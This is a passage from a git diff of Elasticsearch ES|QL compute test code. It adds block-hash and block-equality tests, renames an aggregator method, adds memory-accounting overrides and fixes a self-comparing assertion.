page.getPositionCount(); p++) { + var key = keyBlock.getBytesRef(p, spare); + int valueCount = valueBlock.getValueCount(p); + for (int i = 0; i < valueCount; i++) { + long val = valueBlock.getLong(valueBlock.getFirstValueIndex(p) + i); + boolean added = actualValues.computeIfAbsent(BytesRef.deepCopyOf(key), k -> new HashSet<>()).add(val); + assertTrue(actualValues.toString(), added); + } + } + page.releaseBlocks(); + }) + ); + OperatorTestCase.runDriver(driver); + assertDriverContext(driverContext); + assertThat(actualValues, equalTo(expectedValues)); + org.elasticsearch.common.util.MockBigArrays.ensureAllArraysAreReleased(); + } + } + assertThat(blockFactory.breaker().getUsed(), equalTo(0L)); + } + public void testPushRoundToToQuery() throws IOException { long firstGroupMax = randomLong(); long secondGroupMax = randomLong(); @@ -274,6 +383,7 @@ public void testPushRoundToToQuery() throws IOException { LuceneOperator.NO_LIMIT ); ValuesSourceReaderOperator.Factory load = new ValuesSourceReaderOperator.Factory( + ByteSizeValue.ofGb(1), List.of( new ValuesSourceReaderOperator.FieldInfo("v", ElementType.LONG, f -> new BlockDocValuesReader.LongsBlockLoader("v")) ), @@ -300,7 +410,6 @@ public void testPushRoundToToQuery() throws IOException { boolean sawSecondMax = false; boolean sawThirdMax = false; for (Page page : pages) { - logger.error("ADFA {}", page); LongVector group = page.getBlock(1).asVector(); LongVector value = page.getBlock(2).asVector(); for (int p = 0; p < page.getPositionCount(); p++) { diff --git a/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/aggregation/FilteredGroupingAggregatorFunctionTests.java b/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/aggregation/FilteredGroupingAggregatorFunctionTests.java index dbd5d0cc167d1..9a9421e40c615 100644 --- a/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/aggregation/FilteredGroupingAggregatorFunctionTests.java +++ b/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/aggregation/FilteredGroupingAggregatorFunctionTests.java @@ -124,7 +124,7 @@ public void testAddIntermediateRowInput() { while ((p = source.getOutput()) != null) { try ( IntVector group = ctx.blockFactory().newConstantIntVector(0, p.getPositionCount()); - GroupingAggregatorFunction.AddInput addInput = leaf.prepareProcessPage(null, p) + GroupingAggregatorFunction.AddInput addInput = leaf.prepareProcessRawInputPage(null, p) ) { addInput.add(0, group); } finally { @@ -192,6 +192,11 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + return 0; + } + @Override public void close() { if (unclosed.remove(tracker) == false) { diff --git a/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/aggregation/GroupingAggregatorFunctionTestCase.java b/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/aggregation/GroupingAggregatorFunctionTestCase.java index 9e5039e8fd9b9..04d1221fbe40d 100644 --- a/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/aggregation/GroupingAggregatorFunctionTestCase.java +++ b/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/aggregation/GroupingAggregatorFunctionTestCase.java @@ -661,9 +661,9 @@ public GroupingAggregatorFunction groupingAggregator(DriverContext driverContext BitArray seenGroupIds = new BitArray(0, nonBreakingBigArrays()); @Override - public AddInput prepareProcessPage(SeenGroupIds ignoredSeenGroupIds, Page page) { + public AddInput prepareProcessRawInputPage(SeenGroupIds 
ignoredSeenGroupIds, Page page) { return new AddInput() { - final AddInput delegateAddInput = delegate.prepareProcessPage(bigArrays -> { + final AddInput delegateAddInput = delegate.prepareProcessRawInputPage(bigArrays -> { BitArray seen = new BitArray(0, bigArrays); seen.or(seenGroupIds); return seen; diff --git a/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/aggregation/blockhash/BlockHashTests.java b/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/aggregation/blockhash/BlockHashTests.java index 3ff3be5086ad4..be97055eb9a7e 100644 --- a/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/aggregation/blockhash/BlockHashTests.java +++ b/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/aggregation/blockhash/BlockHashTests.java @@ -11,6 +11,7 @@ import com.carrotsearch.randomizedtesting.annotations.ParametersFactory; import org.apache.lucene.util.BytesRef; +import org.elasticsearch.common.lucene.BytesRefs; import org.elasticsearch.common.unit.ByteSizeValue; import org.elasticsearch.compute.aggregation.GroupingAggregatorFunction; import org.elasticsearch.compute.data.Block; @@ -35,8 +36,10 @@ import org.elasticsearch.xpack.esql.core.util.Holder; import java.util.ArrayList; +import java.util.HashSet; import java.util.List; import java.util.Locale; +import java.util.Set; import java.util.function.Consumer; import java.util.stream.IntStream; import java.util.stream.LongStream; @@ -1232,6 +1235,194 @@ public void testLongNull() { }, blockFactory.newLongArrayVector(values, values.length).asBlock(), blockFactory.newConstantNullBlock(values.length)); } + public void test2BytesRefsHighCardinalityKey() { + final Page page; + int positions1 = 10; + int positions2 = 100_000; + if (randomBoolean()) { + positions1 = 100_000; + positions2 = 10; + } + final int totalPositions = positions1 * positions2; + try ( + BytesRefBlock.Builder builder1 = blockFactory.newBytesRefBlockBuilder(totalPositions); + BytesRefBlock.Builder builder2 = blockFactory.newBytesRefBlockBuilder(totalPositions); + ) { + for (int i = 0; i < positions1; i++) { + for (int p = 0; p < positions2; p++) { + builder1.appendBytesRef(new BytesRef("abcdef" + i)); + builder2.appendBytesRef(new BytesRef("abcdef" + p)); + } + } + page = new Page(builder1.build(), builder2.build()); + } + record Output(int offset, IntBlock block, IntVector vector) implements Releasable { + @Override + public void close() { + Releasables.close(block, vector); + } + } + List output = new ArrayList<>(); + + try (BlockHash hash1 = new BytesRef2BlockHash(blockFactory, 0, 1, totalPositions);) { + hash1.add(page, new GroupingAggregatorFunction.AddInput() { + @Override + public void add(int positionOffset, IntArrayBlock groupIds) { + groupIds.incRef(); + output.add(new Output(positionOffset, groupIds, null)); + } + + @Override + public void add(int positionOffset, IntBigArrayBlock groupIds) { + groupIds.incRef(); + output.add(new Output(positionOffset, groupIds, null)); + } + + @Override + public void add(int positionOffset, IntVector groupIds) { + groupIds.incRef(); + output.add(new Output(positionOffset, null, groupIds)); + } + + @Override + public void close() { + fail("hashes should not close AddInput"); + } + }); + + Block[] keys = hash1.getKeys(); + try { + Set distinctKeys = new HashSet<>(); + BytesRefBlock block0 = (BytesRefBlock) keys[0]; + BytesRefBlock block1 = (BytesRefBlock) keys[1]; + BytesRef scratch = new BytesRef(); + StringBuilder builder = new StringBuilder(); + for (int i = 0; i < 
totalPositions; i++) { + builder.setLength(0); + builder.append(BytesRefs.toString(block0.getBytesRef(i, scratch))); + builder.append("#"); + builder.append(BytesRefs.toString(block1.getBytesRef(i, scratch))); + distinctKeys.add(builder.toString()); + } + assertThat(distinctKeys.size(), equalTo(totalPositions)); + } finally { + Releasables.close(keys); + } + } finally { + Releasables.close(output); + page.releaseBlocks(); + } + } + + public void test2BytesRefs() { + final Page page; + final int positions = randomIntBetween(1, 1000); + final boolean generateVector = randomBoolean(); + try ( + BytesRefBlock.Builder builder1 = blockFactory.newBytesRefBlockBuilder(positions); + BytesRefBlock.Builder builder2 = blockFactory.newBytesRefBlockBuilder(positions); + ) { + List builders = List.of(builder1, builder2); + for (int p = 0; p < positions; p++) { + for (BytesRefBlock.Builder builder : builders) { + int valueCount = generateVector ? 1 : between(0, 3); + switch (valueCount) { + case 0 -> builder.appendNull(); + case 1 -> builder.appendBytesRef(new BytesRef(Integer.toString(between(1, 100)))); + default -> { + builder.beginPositionEntry(); + for (int v = 0; v < valueCount; v++) { + builder.appendBytesRef(new BytesRef(Integer.toString(between(1, 100)))); + } + builder.endPositionEntry(); + } + } + } + } + page = new Page(builder1.build(), builder2.build()); + } + final int emitBatchSize = between(positions, 10 * 1024); + var groupSpecs = List.of(new BlockHash.GroupSpec(0, ElementType.BYTES_REF), new BlockHash.GroupSpec(1, ElementType.BYTES_REF)); + record Output(int offset, IntBlock block, IntVector vector) implements Releasable { + @Override + public void close() { + Releasables.close(block, vector); + } + } + List output1 = new ArrayList<>(); + List output2 = new ArrayList<>(); + try ( + BlockHash hash1 = new BytesRef2BlockHash(blockFactory, 0, 1, emitBatchSize); + BlockHash hash2 = new PackedValuesBlockHash(groupSpecs, blockFactory, emitBatchSize) + ) { + hash1.add(page, new GroupingAggregatorFunction.AddInput() { + @Override + public void add(int positionOffset, IntArrayBlock groupIds) { + groupIds.incRef(); + output1.add(new Output(positionOffset, groupIds, null)); + } + + @Override + public void add(int positionOffset, IntBigArrayBlock groupIds) { + groupIds.incRef(); + output1.add(new Output(positionOffset, groupIds, null)); + } + + @Override + public void add(int positionOffset, IntVector groupIds) { + groupIds.incRef(); + output1.add(new Output(positionOffset, null, groupIds)); + } + + @Override + public void close() { + fail("hashes should not close AddInput"); + } + }); + hash2.add(page, new GroupingAggregatorFunction.AddInput() { + @Override + public void add(int positionOffset, IntArrayBlock groupIds) { + groupIds.incRef(); + output2.add(new Output(positionOffset, groupIds, null)); + } + + @Override + public void add(int positionOffset, IntBigArrayBlock groupIds) { + groupIds.incRef(); + output2.add(new Output(positionOffset, groupIds, null)); + } + + @Override + public void add(int positionOffset, IntVector groupIds) { + groupIds.incRef(); + output2.add(new Output(positionOffset, null, groupIds)); + } + + @Override + public void close() { + fail("hashes should not close AddInput"); + } + }); + assertThat(output1.size(), equalTo(output2.size())); + for (int i = 0; i < output1.size(); i++) { + Output o1 = output1.get(i); + Output o2 = output2.get(i); + assertThat(o1.offset, equalTo(o2.offset)); + if (o1.vector != null) { + assertNull(o1.block); + assertThat(o1.vector, 
equalTo(o2.vector != null ? o2.vector : o2.block.asVector())); + } else { + assertNull(o2.vector); + assertThat(o1.block, equalTo(o2.block)); + } + } + } finally { + Releasables.close(output1); + Releasables.close(output2); + page.releaseBlocks(); + } + } + public void test3BytesRefs() { final Page page; final int positions = randomIntBetween(1, 1000); @@ -1326,7 +1517,7 @@ public void close() { fail("hashes should not close AddInput"); } }); - assertThat(output1.size(), equalTo(output1.size())); + assertThat(output1.size(), equalTo(output2.size())); for (int i = 0; i < output1.size(); i++) { Output o1 = output1.get(i); Output o2 = output2.get(i); diff --git a/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/data/AggregateMetricDoubleBlockEqualityTests.java b/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/data/AggregateMetricDoubleBlockEqualityTests.java new file mode 100644 index 0000000000000..1a31ca07e546c --- /dev/null +++ b/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/data/AggregateMetricDoubleBlockEqualityTests.java @@ -0,0 +1,89 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0; you may not use this file except in compliance with the Elastic License + * 2.0. + */ + +package org.elasticsearch.compute.data; + +import org.elasticsearch.compute.test.ComputeTestCase; +import org.elasticsearch.compute.test.TestBlockFactory; +import org.elasticsearch.core.Releasables; + +import java.util.List; + +public class AggregateMetricDoubleBlockEqualityTests extends ComputeTestCase { + + static final BlockFactory blockFactory = TestBlockFactory.getNonBreakingInstance(); + + // TODO: Add additional tests + + public void testEmptyBlock() { + // all these "empty" blocks should be equivalent + var partialMetricBuilder = blockFactory.newAggregateMetricDoubleBlockBuilder(0); + for (var subBuilder : List.of( + partialMetricBuilder.min(), + partialMetricBuilder.max(), + partialMetricBuilder.sum(), + partialMetricBuilder.count() + )) { + if (randomBoolean()) { + subBuilder.appendNull(); + } else { + if (subBuilder instanceof DoubleBlockBuilder doubleBlockBuilder) { + doubleBlockBuilder.appendDouble(0.0); + } else if (subBuilder instanceof IntBlockBuilder intBlockBuilder) { + intBlockBuilder.appendInt(0); + } + } + } + + List blocks = List.of( + blockFactory.newAggregateMetricDoubleBlockBuilder(0).build(), + blockFactory.newAggregateMetricDoubleBlockBuilder(0).appendNull().build().filter(), + partialMetricBuilder.build().filter(), + blockFactory.newConstantAggregateMetricDoubleBlock( + new AggregateMetricDoubleBlockBuilder.AggregateMetricDoubleLiteral(0.0, 0.0, 0.0, 0), + 0 + ).filter(), + (ConstantNullBlock) blockFactory.newConstantNullBlock(0) + ); + + assertAllEquals(blocks); + Releasables.close(blocks); + } + + public void testSimpleBlockWithManyNulls() { + int positions = randomIntBetween(1, 256); + boolean grow = randomBoolean(); + AggregateMetricDoubleBlockBuilder builder1 = blockFactory.newAggregateMetricDoubleBlockBuilder(grow ? 0 : positions); + AggregateMetricDoubleBlockBuilder builder2 = blockFactory.newAggregateMetricDoubleBlockBuilder(grow ? 
0 : positions); + ConstantNullBlock.Builder builder3 = new ConstantNullBlock.Builder(blockFactory); + for (int p = 0; p < positions; p++) { + builder1.appendNull(); + builder2.appendNull(); + builder3.appendNull(); + } + AggregateMetricDoubleBlock block1 = builder1.build(); + AggregateMetricDoubleBlock block2 = builder2.build(); + Block block3 = builder3.build(); + assertEquals(positions, block1.getPositionCount()); + assertTrue(block1.mayHaveNulls()); + assertTrue(block1.isNull(0)); + + List blocks = List.of(block1, block2, block3); + assertAllEquals(blocks); + } + + static void assertAllEquals(List objs) { + for (Object obj1 : objs) { + for (Object obj2 : objs) { + assertEquals(obj1, obj2); + assertEquals(obj2, obj1); + // equal objects must generate the same hash code + assertEquals(obj1.hashCode(), obj2.hashCode()); + } + } + } +} diff --git a/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/data/BooleanBlockEqualityTests.java b/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/data/BooleanBlockEqualityTests.java index 7c0c4c48e97de..6bb31b141597f 100644 --- a/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/data/BooleanBlockEqualityTests.java +++ b/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/data/BooleanBlockEqualityTests.java @@ -52,7 +52,8 @@ public void testEmptyBlock() { blockFactory.newConstantBooleanBlockWith(randomBoolean(), 0), blockFactory.newBooleanBlockBuilder(0).build(), blockFactory.newBooleanBlockBuilder(0).appendBoolean(randomBoolean()).build().filter(), - blockFactory.newBooleanBlockBuilder(0).appendNull().build().filter() + blockFactory.newBooleanBlockBuilder(0).appendNull().build().filter(), + (ConstantNullBlock) blockFactory.newConstantNullBlock(0) ); assertAllEquals(blocks); } @@ -252,6 +253,28 @@ public void testBlockInequality() { assertAllNotEquals(notEqualBlocks); } + public void testSimpleBlockWithManyNulls() { + int positions = randomIntBetween(1, 256); + boolean grow = randomBoolean(); + BooleanBlock.Builder builder1 = blockFactory.newBooleanBlockBuilder(grow ? 0 : positions); + BooleanBlock.Builder builder2 = blockFactory.newBooleanBlockBuilder(grow ? 
0 : positions); + ConstantNullBlock.Builder builder3 = new ConstantNullBlock.Builder(blockFactory); + for (int p = 0; p < positions; p++) { + builder1.appendNull(); + builder2.appendNull(); + builder3.appendNull(); + } + BooleanBlock block1 = builder1.build(); + BooleanBlock block2 = builder2.build(); + Block block3 = builder3.build(); + assertEquals(positions, block1.getPositionCount()); + assertTrue(block1.mayHaveNulls()); + assertTrue(block1.isNull(0)); + + List blocks = List.of(block1, block2, block3); + assertAllEquals(blocks); + } + static void assertAllEquals(List objs) { for (Object obj1 : objs) { for (Object obj2 : objs) { diff --git a/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/data/BytesRefBlockEqualityTests.java b/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/data/BytesRefBlockEqualityTests.java index ddf8b1a28bc26..5a81c3b4f0a8e 100644 --- a/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/data/BytesRefBlockEqualityTests.java +++ b/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/data/BytesRefBlockEqualityTests.java @@ -63,7 +63,8 @@ public void testEmptyBlock() { blockFactory.newConstantBytesRefBlockWith(new BytesRef(), 0), blockFactory.newBytesRefBlockBuilder(0).build(), blockFactory.newBytesRefBlockBuilder(0).appendBytesRef(new BytesRef()).build().filter(), - blockFactory.newBytesRefBlockBuilder(0).appendNull().build().filter() + blockFactory.newBytesRefBlockBuilder(0).appendNull().build().filter(), + (ConstantNullBlock) blockFactory.newConstantNullBlock(0) ); assertAllEquals(blocks); } @@ -357,17 +358,20 @@ public void testSimpleBlockWithManyNulls() { boolean grow = randomBoolean(); BytesRefBlock.Builder builder1 = blockFactory.newBytesRefBlockBuilder(grow ? 0 : positions); BytesRefBlock.Builder builder2 = blockFactory.newBytesRefBlockBuilder(grow ? 
0 : positions); + ConstantNullBlock.Builder builder3 = new ConstantNullBlock.Builder(blockFactory); for (int p = 0; p < positions; p++) { builder1.appendNull(); builder2.appendNull(); + builder3.appendNull(); } BytesRefBlock block1 = builder1.build(); BytesRefBlock block2 = builder2.build(); + Block block3 = builder3.build(); assertEquals(positions, block1.getPositionCount()); assertTrue(block1.mayHaveNulls()); assertTrue(block1.isNull(0)); - List blocks = List.of(block1, block2); + List blocks = List.of(block1, block2, block3); assertAllEquals(blocks); } diff --git a/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/data/DoubleBlockEqualityTests.java b/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/data/DoubleBlockEqualityTests.java index 0bdcd8a29add9..0882c57e538a6 100644 --- a/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/data/DoubleBlockEqualityTests.java +++ b/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/data/DoubleBlockEqualityTests.java @@ -51,7 +51,8 @@ public void testEmptyBlock() { blockFactory.newConstantDoubleBlockWith(0, 0), blockFactory.newDoubleBlockBuilder(0).build(), blockFactory.newDoubleBlockBuilder(0).appendDouble(1).build().filter(), - blockFactory.newDoubleBlockBuilder(0).appendNull().build().filter() + blockFactory.newDoubleBlockBuilder(0).appendNull().build().filter(), + (ConstantNullBlock) blockFactory.newConstantNullBlock(0) ); assertAllEquals(blocks); Releasables.close(blocks); @@ -234,17 +235,20 @@ public void testSimpleBlockWithManyNulls() { boolean grow = randomBoolean(); DoubleBlock.Builder builder1 = blockFactory.newDoubleBlockBuilder(grow ? 0 : positions); DoubleBlock.Builder builder2 = blockFactory.newDoubleBlockBuilder(grow ? 0 : positions); + ConstantNullBlock.Builder builder3 = new ConstantNullBlock.Builder(blockFactory); for (int p = 0; p < positions; p++) { builder1.appendNull(); builder2.appendNull(); + builder3.appendNull(); } DoubleBlock block1 = builder1.build(); DoubleBlock block2 = builder2.build(); + Block block3 = builder3.build(); assertEquals(positions, block1.getPositionCount()); assertTrue(block1.mayHaveNulls()); assertTrue(block1.isNull(0)); - List blocks = List.of(block1, block2); + List blocks = List.of(block1, block2, block3); assertAllEquals(blocks); } diff --git a/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/data/FloatBlockEqualityTests.java b/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/data/FloatBlockEqualityTests.java index 046567ff5987d..e63597d7ff4b0 100644 --- a/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/data/FloatBlockEqualityTests.java +++ b/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/data/FloatBlockEqualityTests.java @@ -51,7 +51,8 @@ public void testEmptyBlock() { blockFactory.newConstantFloatBlockWith(0, 0), blockFactory.newFloatBlockBuilder(0).build(), blockFactory.newFloatBlockBuilder(0).appendFloat(1).build().filter(), - blockFactory.newFloatBlockBuilder(0).appendNull().build().filter() + blockFactory.newFloatBlockBuilder(0).appendNull().build().filter(), + (ConstantNullBlock) blockFactory.newConstantNullBlock(0) ); assertAllEquals(blocks); Releasables.close(blocks); @@ -234,17 +235,20 @@ public void testSimpleBlockWithManyNulls() { boolean grow = randomBoolean(); FloatBlock.Builder builder1 = blockFactory.newFloatBlockBuilder(grow ? 0 : positions); FloatBlock.Builder builder2 = blockFactory.newFloatBlockBuilder(grow ? 
0 : positions); + ConstantNullBlock.Builder builder3 = new ConstantNullBlock.Builder(blockFactory); for (int p = 0; p < positions; p++) { builder1.appendNull(); builder2.appendNull(); + builder3.appendNull(); } FloatBlock block1 = builder1.build(); FloatBlock block2 = builder2.build(); + Block block3 = builder3.build(); assertEquals(positions, block1.getPositionCount()); assertTrue(block1.mayHaveNulls()); assertTrue(block1.isNull(0)); - List blocks = List.of(block1, block2); + List blocks = List.of(block1, block2, block3); assertAllEquals(blocks); } diff --git a/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/data/IntBlockEqualityTests.java b/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/data/IntBlockEqualityTests.java index eb68bdf7a59d6..7e6a53054277d 100644 --- a/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/data/IntBlockEqualityTests.java +++ b/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/data/IntBlockEqualityTests.java @@ -50,7 +50,8 @@ public void testEmptyBlock() { blockFactory.newConstantIntBlockWith(0, 0), blockFactory.newIntBlockBuilder(0).build(), blockFactory.newIntBlockBuilder(0).appendInt(1).build().filter(), - blockFactory.newIntBlockBuilder(0).appendNull().build().filter() + blockFactory.newIntBlockBuilder(0).appendNull().build().filter(), + (ConstantNullBlock) blockFactory.newConstantNullBlock(0) ); assertAllEquals(blocks); } @@ -203,17 +204,20 @@ public void testSimpleBlockWithManyNulls() { boolean grow = randomBoolean(); IntBlock.Builder builder1 = blockFactory.newIntBlockBuilder(grow ? 0 : positions); IntBlock.Builder builder2 = blockFactory.newIntBlockBuilder(grow ? 0 : positions); + ConstantNullBlock.Builder builder3 = new ConstantNullBlock.Builder(blockFactory); for (int p = 0; p < positions; p++) { builder1.appendNull(); builder2.appendNull(); + builder3.appendNull(); } IntBlock block1 = builder1.build(); IntBlock block2 = builder2.build(); + Block block3 = builder3.build(); assertEquals(positions, block1.getPositionCount()); assertTrue(block1.mayHaveNulls()); assertTrue(block1.isNull(0)); - List blocks = List.of(block1, block2); + List blocks = List.of(block1, block2, block3); assertAllEquals(blocks); } diff --git a/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/data/LongBlockEqualityTests.java b/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/data/LongBlockEqualityTests.java index 6d6a832d27e54..6dc21a56ad27f 100644 --- a/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/data/LongBlockEqualityTests.java +++ b/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/data/LongBlockEqualityTests.java @@ -50,7 +50,8 @@ public void testEmptyBlock() { blockFactory.newConstantLongBlockWith(0, 0), blockFactory.newLongBlockBuilder(0).build(), blockFactory.newLongBlockBuilder(0).appendLong(1).build().filter(), - blockFactory.newLongBlockBuilder(0).appendNull().build().filter() + blockFactory.newLongBlockBuilder(0).appendNull().build().filter(), + (ConstantNullBlock) blockFactory.newConstantNullBlock(0) ); assertAllEquals(blocks); } @@ -201,17 +202,20 @@ public void testSimpleBlockWithManyNulls() { boolean grow = randomBoolean(); LongBlock.Builder builder1 = blockFactory.newLongBlockBuilder(grow ? 0 : positions); LongBlock.Builder builder2 = blockFactory.newLongBlockBuilder(grow ? 
0 : positions); + ConstantNullBlock.Builder builder3 = new ConstantNullBlock.Builder(blockFactory); for (int p = 0; p < positions; p++) { builder1.appendNull(); builder2.appendNull(); + builder3.appendNull(); } LongBlock block1 = builder1.build(); LongBlock block2 = builder2.build(); + Block block3 = builder3.build(); assertEquals(positions, block1.getPositionCount()); assertTrue(block1.mayHaveNulls()); assertTrue(block1.isNull(0)); - List blocks = List.of(block1, block2); + List blocks = List.of(block1, block2, block3); assertAllEquals(blocks); } diff --git a/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/lucene/LuceneQueryEvaluatorTests.java b/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/lucene/LuceneQueryEvaluatorTests.java index 4828f70e51dcd..25dd9fc160ec7 100644 --- a/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/lucene/LuceneQueryEvaluatorTests.java +++ b/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/lucene/LuceneQueryEvaluatorTests.java @@ -23,6 +23,7 @@ import org.apache.lucene.tests.index.RandomIndexWriter; import org.apache.lucene.tests.store.BaseDirectoryWrapper; import org.apache.lucene.util.BytesRef; +import org.elasticsearch.common.unit.ByteSizeValue; import org.elasticsearch.compute.OperatorTests; import org.elasticsearch.compute.data.BlockFactory; import org.elasticsearch.compute.data.BytesRefBlock; @@ -32,6 +33,7 @@ import org.elasticsearch.compute.data.ElementType; import org.elasticsearch.compute.data.Page; import org.elasticsearch.compute.data.Vector; +import org.elasticsearch.compute.lucene.read.ValuesSourceReaderOperator; import org.elasticsearch.compute.operator.Driver; import org.elasticsearch.compute.operator.DriverContext; import org.elasticsearch.compute.operator.Operator; @@ -200,6 +202,7 @@ private List runQuery(Set values, Query query, boolean shuffleDocs operators.add( new ValuesSourceReaderOperator( blockFactory, + ByteSizeValue.ofGb(1).getBytes(), List.of( new ValuesSourceReaderOperator.FieldInfo( FIELD, @@ -215,7 +218,7 @@ private List runQuery(Set values, Query query, boolean shuffleDocs ); LuceneQueryEvaluator.ShardConfig[] shards = new LuceneQueryEvaluator.ShardConfig[] { new LuceneQueryEvaluator.ShardConfig(searcher.rewrite(query), searcher) }; - operators.add(createOperator(blockFactory, shards)); + operators.add(createOperator(driverContext, shards)); List results = new ArrayList<>(); Driver driver = TestDriverFactory.create( driverContext, @@ -294,7 +297,7 @@ private static LuceneOperator.Factory luceneOperatorFactory(IndexReader reader, /** * Create the operator to test */ - protected abstract Operator createOperator(BlockFactory blockFactory, LuceneQueryEvaluator.ShardConfig[] shards); + protected abstract Operator createOperator(DriverContext driverContext, LuceneQueryEvaluator.ShardConfig[] shards); /** * Should the test use scoring? 
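Editor's aside: the baseRamBytesUsed() additions above all follow one composition pattern, visible in MultivalueDedupe.Evaluator earlier in this diff. A minimal sketch of that pattern under the same contract (DelegatingEvaluator is hypothetical; it reports its own shallow size plus the delegate's figure, and deliberately leaves separately breaker-tracked memory out):

    import org.apache.lucene.util.RamUsageEstimator;
    import org.elasticsearch.compute.data.Block;
    import org.elasticsearch.compute.data.Page;
    import org.elasticsearch.compute.operator.EvalOperator.ExpressionEvaluator;

    /** Hypothetical wrapper showing how baseRamBytesUsed() composes through delegates. */
    class DelegatingEvaluator implements ExpressionEvaluator {
        private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(DelegatingEvaluator.class);
        private final ExpressionEvaluator field;

        DelegatingEvaluator(ExpressionEvaluator field) {
            this.field = field;
        }

        @Override
        public Block eval(Page page) {
            return field.eval(page); // pass-through; a real evaluator would transform the result
        }

        @Override
        public long baseRamBytesUsed() {
            // Shallow size of this instance plus whatever the wrapped evaluator reports.
            // Memory tracked elsewhere (e.g. a BreakingBytesRefBuilder) is excluded.
            return BASE_RAM_BYTES_USED + field.baseRamBytesUsed();
        }

        @Override
        public void close() {
            field.close(); // release the wrapped evaluator's resources
        }
    }
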
diff --git a/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/lucene/LuceneQueryExpressionEvaluatorTests.java b/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/lucene/LuceneQueryExpressionEvaluatorTests.java index ba9e62abb8b35..a6e4840531404 100644 --- a/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/lucene/LuceneQueryExpressionEvaluatorTests.java +++ b/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/lucene/LuceneQueryExpressionEvaluatorTests.java @@ -8,10 +8,10 @@ package org.elasticsearch.compute.lucene; import org.apache.lucene.search.Scorable; -import org.elasticsearch.compute.data.BlockFactory; import org.elasticsearch.compute.data.BooleanVector; import org.elasticsearch.compute.data.Page; import org.elasticsearch.compute.lucene.LuceneQueryEvaluator.DenseCollector; +import org.elasticsearch.compute.operator.DriverContext; import org.elasticsearch.compute.operator.EvalOperator; import org.elasticsearch.compute.operator.Operator; @@ -38,8 +38,8 @@ protected Scorable getScorer() { } @Override - protected Operator createOperator(BlockFactory blockFactory, LuceneQueryEvaluator.ShardConfig[] shards) { - return new EvalOperator(blockFactory, new LuceneQueryExpressionEvaluator(blockFactory, shards)); + protected Operator createOperator(DriverContext ctx, LuceneQueryEvaluator.ShardConfig[] shards) { + return new EvalOperator(ctx, new LuceneQueryExpressionEvaluator(ctx.blockFactory(), shards)); } @Override diff --git a/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/lucene/LuceneQueryScoreEvaluatorTests.java b/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/lucene/LuceneQueryScoreEvaluatorTests.java index 53fa3f775386c..1a460f3d26542 100644 --- a/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/lucene/LuceneQueryScoreEvaluatorTests.java +++ b/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/lucene/LuceneQueryScoreEvaluatorTests.java @@ -8,9 +8,9 @@ package org.elasticsearch.compute.lucene; import org.apache.lucene.search.Scorable; -import org.elasticsearch.compute.data.BlockFactory; import org.elasticsearch.compute.data.DoubleVector; import org.elasticsearch.compute.data.Page; +import org.elasticsearch.compute.operator.DriverContext; import org.elasticsearch.compute.operator.Operator; import org.elasticsearch.compute.operator.ScoreOperator; @@ -47,8 +47,8 @@ public float score() throws IOException { } @Override - protected Operator createOperator(BlockFactory blockFactory, LuceneQueryEvaluator.ShardConfig[] shards) { - return new ScoreOperator(blockFactory, new LuceneQueryScoreEvaluator(blockFactory, shards), 1); + protected Operator createOperator(DriverContext ctx, LuceneQueryEvaluator.ShardConfig[] shards) { + return new ScoreOperator(ctx.blockFactory(), new LuceneQueryScoreEvaluator(ctx.blockFactory(), shards), 1); } @Override diff --git 